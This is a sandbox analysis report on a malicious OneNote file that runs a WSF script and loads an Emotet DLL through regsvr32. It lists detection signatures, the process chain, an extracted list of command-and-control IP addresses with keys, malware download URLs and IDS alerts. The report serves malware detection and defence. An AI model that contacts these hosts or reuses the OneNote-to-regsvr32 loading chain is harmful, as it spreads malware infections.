Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Insight_Medical_Publishing_3.one

Overview

General Information

Sample Name:Insight_Medical_Publishing_3.one
Analysis ID:828495
MD5:0d8f675a79a32d286f8eccb2ff989c91
SHA1:e0796075d09841386c12f37503495c9624a3c393
SHA256:7ef31d3538810c895812e331db91f905693b99b682d062d9d0b4dab5df0da0a2
Tags:one
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Malicious OneNote
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Run temp file via regsvr32
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • ONENOTE.EXE (PID: 5852 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_3.one MD5: 8D7E99CB358318E1F38803C9E6B67867)
    • wscript.exe (PID: 4976 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)
      • regsvr32.exe (PID: 4920 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
        • regsvr32.exe (PID: 3156 cmdline: "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
          • regsvr32.exe (PID: 1652 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
EmotetWhile Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.
  • GOLD CABIN
  • MUMMY SPIDER
  • Mealybug
https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5OWVpqQATAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2gGXgqQAuAJA="]}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Insight_Medical_Publishing_3.oneJoeSecurity_MalOneNoteYara detected Malicious OneNoteJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
    • 0x38fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x3a1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x962:$jsp4: public
    • 0xfa2:$jsp4: public
    • 0x1e6a:$jsp4: public
    • 0x2822:$jsp4: public
    • 0x2e62:$jsp4: public
    • 0x4322:$jsp4: public
    • 0x4962:$jsp4: public
    • 0x61c:$asp_payload11: wscript.shell
    • 0x24dc:$asp_payload11: wscript.shell
    • 0x3fdc:$asp_payload11: wscript.shell
    • 0x204:$asp_multi_payload_one1: createobject
    • 0x2f2:$asp_multi_payload_one1: createobject
    • 0x36a:$asp_multi_payload_one1: createobject
    • 0x3c4:$asp_multi_payload_one1: createobject
    • 0x600:$asp_multi_payload_one1: createobject
    • 0xd66:$asp_multi_payload_one1: createobject
    • 0x20c4:$asp_multi_payload_one1: createobject
    • 0x21b2:$asp_multi_payload_one1: createobject
    • 0x222a:$asp_multi_payload_one1: createobject
    00000009.00000003.348706974.000000000518A000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
    • 0x4ce:$asp_gen_obf1: "+"
    • 0x4fe:$asp_gen_obf1: "+"
    • 0x238e:$asp_gen_obf1: "+"
    • 0x23be:$asp_gen_obf1: "+"
    • 0x3e8e:$asp_gen_obf1: "+"
    • 0x3ebe:$asp_gen_obf1: "+"
    • 0x38fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x3a1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x962:$jsp4: public
    • 0xfa2:$jsp4: public
    • 0x1e6a:$jsp4: public
    • 0x2822:$jsp4: public
    • 0x2e62:$jsp4: public
    • 0x4322:$jsp4: public
    • 0x4962:$jsp4: public
    • 0x2e2:$asp_input1: request
    • 0xb10:$asp_input1: request
    • 0xb52:$asp_input1: request
    • 0xc68:$asp_input1: request
    • 0x21a2:$asp_input1: request
    • 0x29d0:$asp_input1: request
    00000009.00000003.346224913.0000000005175000.00000004.00000020.00020000.00000000.sdmpWEBSHELL_asp_genericGeneric ASP webshell which uses any eval/exec function indirectly on user input or writes a fileArnim Rupp
    • 0xe066:$asp_gen_obf1: "+"
    • 0xe096:$asp_gen_obf1: "+"
    • 0x154ce:$asp_gen_obf1: "+"
    • 0x154fe:$asp_gen_obf1: "+"
    • 0x1738e:$asp_gen_obf1: "+"
    • 0x173be:$asp_gen_obf1: "+"
    • 0x18e8e:$asp_gen_obf1: "+"
    • 0x18ebe:$asp_gen_obf1: "+"
    • 0x8f00:$tagasp_short2: %>
    • 0x188fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0x18a1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
    • 0xe4fa:$jsp4: public
    • 0x15962:$jsp4: public
    • 0x15fa2:$jsp4: public
    • 0x16e6a:$jsp4: public
    • 0x17822:$jsp4: public
    • 0x17e62:$jsp4: public
    • 0x19322:$jsp4: public
    • 0x19962:$jsp4: public
    • 0xde7a:$asp_input1: request
    • 0xe6a8:$asp_input1: request
    0000000C.00000002.580204342.0000000002B11000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000009.00000003.347622434.0000000005182000.00000004.00000020.00020000.00000000.sdmpwebshell_asp_obfuscatedASP webshell obfuscatedArnim Rupp
      • 0xb8fa:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
      • 0xba1a:$tagasp_classid5: 0D43FE01-F093-11CF-8940-00A0C9054228
      • 0x14fa:$jsp4: public
      • 0x8962:$jsp4: public
      • 0x8fa2:$jsp4: public
      • 0x9e6a:$jsp4: public
      • 0xa822:$jsp4: public
      • 0xae62:$jsp4: public
      • 0xc322:$jsp4: public
      • 0xc962:$jsp4: public
      • 0x11b4:$asp_payload11: wscript.shell
      • 0x861c:$asp_payload11: wscript.shell
      • 0xa4dc:$asp_payload11: wscript.shell
      • 0xbfdc:$asp_payload11: wscript.shell
      • 0xd9c:$asp_multi_payload_one1: createobject
      • 0xe8a:$asp_multi_payload_one1: createobject
      • 0xf02:$asp_multi_payload_one1: createobject
      • 0xf5c:$asp_multi_payload_one1: createobject
      • 0x1198:$asp_multi_payload_one1: createobject
      • 0x18fe:$asp_multi_payload_one1: createobject
      • 0x8204:$asp_multi_payload_one1: createobject
      Click to see the 11 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.regsvr32.exe.1220000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        12.2.regsvr32.exe.1220000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          11.2.regsvr32.exe.f10000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            11.2.regsvr32.exe.f10000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security

              Sigma Signatures

              Malware Analysis System Evasion

              barindex
              Sigma detected: Run temp file via regsvr32
              Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 4976, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dll, ProcessId: 4920, ProcessName: regsvr32.exe

              Snort Signatures

              Timestamp:192.168.2.366.228.32.314968670802404330 03/17/23-09:17:28.925917
              SID:2404330
              Source Port:49686
              Destination Port:7080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3104.168.155.1434969480802404302 03/17/23-09:18:01.076339
              SID:2404302
              Source Port:49694
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3182.162.143.56496874432404312 03/17/23-09:17:34.182038
              SID:2404312
              Source Port:49687
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.391.121.146.474968480802404344 03/17/23-09:17:19.192203
              SID:2404344
              Source Port:49684
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.3167.172.199.1654968980802404308 03/17/23-09:17:48.416747
              SID:2404308
              Source Port:49689
              Destination Port:8080
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Multi AV Scanner detection for submitted file
              Source: Insight_Medical_Publishing_3.oneReversingLabs: Detection: 30%
              Source: Insight_Medical_Publishing_3.oneVirustotal: Detection: 41%Perma Link
              Antivirus detection for URL or domain
              Source: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/#Avira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/eBAvira URL Cloud: Label: malware
              Source: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/Avira URL Cloud: Label: malware
              Source: https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/Avira URL Cloud: Label: malware
              Source: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/xAvira URL Cloud: Label: malware
              Source: http://softwareulike.com/cWIYxWMPkK/Avira URL Cloud: Label: malware
              Source: https://159.89.202.34/Avira URL Cloud: Label: malware
              Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/Avira URL Cloud: Label: malware
              Source: https://91.121.146.47:8080/Avira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/Avira URL Cloud: Label: malware
              Source: https://www.gomespontes.com.br/logs/pd/vMAvira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/Avira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/lAvira URL Cloud: Label: malware
              Source: https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/hAvira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ITAvira URL Cloud: Label: malware
              Source: https://91.121.146.47:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/000Avira URL Cloud: Label: malware
              Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllAvira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/nAvira URL Cloud: Label: malware
              Source: http://ozmeydan.com/cekici/9/Avira URL Cloud: Label: malware
              Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wMAvira URL Cloud: Label: malware
              Source: https://www.gomespontes.com.br/logs/pd/Avira URL Cloud: Label: malware
              Source: https://penshorn.org/admin/Ses8712iGR8du/tMAvira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/mwollpl/Avira URL Cloud: Label: malware
              Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uMAvira URL Cloud: Label: malware
              Source: https://penshorn.org/admin/Ses8712iGR8du/Avira URL Cloud: Label: malware
              Source: http://softwareulike.com/cWIYxWMPkK/7Avira URL Cloud: Label: malware
              Source: https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/Avira URL Cloud: Label: malware
              Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/Avira URL Cloud: Label: malware
              Source: http://softwareulike.com/cWIYxWMPkK/yMAvira URL Cloud: Label: malware
              Source: https://182.162.143.56/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/l/Avira URL Cloud: Label: malware
              Source: https://167.172.199.165:8080/8Avira URL Cloud: Label: malware
              Source: https://159.89.202.34/IAvira URL Cloud: Label: malware
              Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/.dllNZrAvira URL Cloud: Label: malware
              Source: http://ozmeydan.com/cekici/9/xMAvira URL Cloud: Label: malware
              Source: https://187.63.160.88:80/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/01Avira URL Cloud: Label: malware
              Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/Avira URL Cloud: Label: malware
              Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zMAvira URL Cloud: Label: malware
              Source: https://66.228.32.31:7080/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/_Avira URL Cloud: Label: malware
              Source: https://159.89.202.34/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/Avira URL Cloud: Label: malware
              Source: https://164.90.222.65/qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/Avira URL Cloud: Label: malware
              Source: https://163.44.196.120:8080/3Avira URL Cloud: Label: malware
              Multi AV Scanner detection for domain / URL
              Source: penshorn.orgVirustotal: Detection: 10%Perma Link
              Source: https://159.89.202.34/Virustotal: Detection: 18%Perma Link
              Source: http://softwareulike.com/cWIYxWMPkK/Virustotal: Detection: 16%Perma Link
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\rad38C2A.tmp.dllReversingLabs: Detection: 58%
              Source: C:\Windows\System32\ZLTlFkhzfcDaCjB\GJcmgWEWTZrc.dll (copy)ReversingLabs: Detection: 58%
              Source: 0000000C.00000002.579579352.0000000001268000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5OWVpqQATAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2gGXgqQAuAJA="]}
              Source: unknownHTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.3:49683 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49687 version: TLS 1.2
              Source: Binary string: ain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdbain.pdb0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: OneNote15WatsonLog.etl.0.dr
              Source: Binary string: P:\Target\x86\ship\onenote\x-none\onmain.pdb source: OneNote15WatsonLog.etl.0.dr
              Source: C:\Windows\System32\regsvr32.exeCode function: 11_2_0000000180008D28 FindFirstFileExW,11_2_0000000180008D28

              Software Vulnerabilities

              barindex
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXEProcess created: C:\Windows\SysWOW64\wscript.exe

              Networking

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 164.90.222.65 443Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 203.26.41.131 443Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeDomain query: penshorn.org
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 66.228.32.31 7080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 187.63.160.88 80Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.168.155.143 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 159.89.202.34 443Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 91.121.146.47 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 160.16.142.56 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 182.162.143.56 443Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 167.172.199.165 8080Jump to behavior
              Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 163.44.196.120 8080Jump to behavior
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.3:49687 -> 182.162.143.56:443
              Source: TrafficSnort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.3:49684 -> 91.121.146.47:8080
              Source: TrafficSnort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.3:49686 -> 66.228.32.31:7080
              Source: TrafficSnort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.3:49689 -> 167.172.199.165:8080
              Source: TrafficSnort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.3:49694 -> 104.168.155.143:8080
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorIPs: 91.121.146.47:8080
              Source: Malware configuration extractorIPs: 66.228.32.31:7080
              Source: Malware configuration extractorIPs: 182.162.143.56:443
              Source: Malware configuration extractorIPs: 187.63.160.88:80
              Source: Malware configuration extractorIPs: 167.172.199.165:8080
              Source: Malware configuration extractorIPs: 164.90.222.65:443
              Source: Malware configuration extractorIPs: 104.168.155.143:8080
              Source: Malware configuration extractorIPs: 163.44.196.120:8080
              Source: Malware configuration extractorIPs: 160.16.142.56:8080
              Source: Malware configuration extractorIPs: 159.89.202.34:443
              Source: Malware configuration extractorIPs: 159.65.88.10:8080
              Source: Malware configuration extractorIPs: 186.194.240.217:443
              Source: Malware configuration extractorIPs: 149.56.131.28:8080
              Source: Malware configuration extractorIPs: 72.15.201.15:8080
              Source: Malware configuration extractorIPs: 1.234.2.232:8080
              Source: Malware configuration extractorIPs: 82.223.21.224:8080
              Source: Malware configuration extractorIPs: 206.189.28.199:8080
              Source: Malware configuration extractorIPs: 169.57.156.166:8080
              Source: Malware configuration extractorIPs: 107.170.39.149:8080
              Source: Malware configuration extractorIPs: 103.43.75.120:443
              Source: Malware configuration extractorIPs: 91.207.28.33:8080
              Source: Malware configuration extractorIPs: 213.239.212.5:443
              Source: Malware configuration extractorIPs: 45.235.8.30:8080
              Source: Malware configuration extractorIPs: 119.59.103.152:8080
              Source: Malware configuration extractorIPs: 164.68.99.3:8080
              Source: Malware configuration extractorIPs: 95.217.221.146:8080
              Source: Malware configuration extractorIPs: 153.126.146.25:7080
              Source: Malware configuration extractorIPs: 197.242.150.244:8080
              Source: Malware configuration extractorIPs: 202.129.205.3:8080
              Source: Malware configuration extractorIPs: 103.132.242.26:8080
              Source: Malware configuration extractorIPs: 139.59.126.41:443
              Source: Malware configuration extractorIPs: 110.232.117.186:8080
              Source: Malware configuration extractorIPs: 183.111.227.137:8080
              Source: Malware configuration extractorIPs: 5.135.159.50:443
              Source: Malware configuration extractorIPs: 201.94.166.162:443
              Source: Malware configuration extractorIPs: 103.75.201.2:443
              Source: Malware configuration extractorIPs: 79.137.35.198:8080
              Source: Malware configuration extractorIPs: 172.105.226.75:8080
              Source: Malware configuration extractorIPs: 94.23.45.86:4143
              Source: Malware configuration extractorIPs: 115.68.227.76:8080
              Source: Malware configuration extractorIPs: 153.92.5.27:8080
              Source: Malware configuration extractorIPs: 167.172.253.162:8080
              Source: Malware configuration extractorIPs: 188.44.20.25:443
              Source: Malware configuration extractorIPs: 147.139.166.154:8080
              Source: Malware configuration extractorIPs: 129.232.188.93:443
              Source: Malware configuration extractorIPs: 173.212.193.249:8080
              Source: Malware configuration extractorIPs: 185.4.135.165:8080
              Source: Malware configuration extractorIPs: 45.176.232.124:443
              Source: Joe Sandbox ViewASN Name: RACKCORP-APRackCorpAU RACKCORP-APRackCorpAU
              Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
              Source: global trafficHTTP traffic detected: POST /qudwkmxm/xmonncmqfa/dpvphsc/beehnbizxmwollpl/ HTTP/1.1Connection: Keep-AliveContent-Length: 0Host: 182.162.143.56
              Source: Joe Sandbox ViewIP Address: 110.232.117.186 110.232.117.186
              Source: global trafficHTTP traffic detected: GET /admin/Ses8712iGR8du/ HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: penshorn.org
              Source: global trafficTCP traffic: 192.168.2.3:49684 -> 91.121.146.47:8080
              Source: global trafficTCP traffic: 192.168.2.3:49686 -> 66.228.32.31:7080
              Source: global trafficTCP traffic: 192.168.2.3:49689 -> 167.172.199.165:8080
              Source: global trafficTCP traffic: 192.168.2.3:49694 -> 104.168.155.143:8080
              Source: global trafficTCP traffic: 192.168.2.3:49695 -> 163.44.196.120:8080
              Source: global trafficTCP traffic: 192.168.2.3:49696 -> 160.16.142.56:8080
              Source: unknownNetwork traffic detected: IP country count 17
              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
              Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 91.121.146.47
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 66.228.32.31
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
              Source: unknownTCP traffic detected without corresponding DNS query: 182.162.143.56
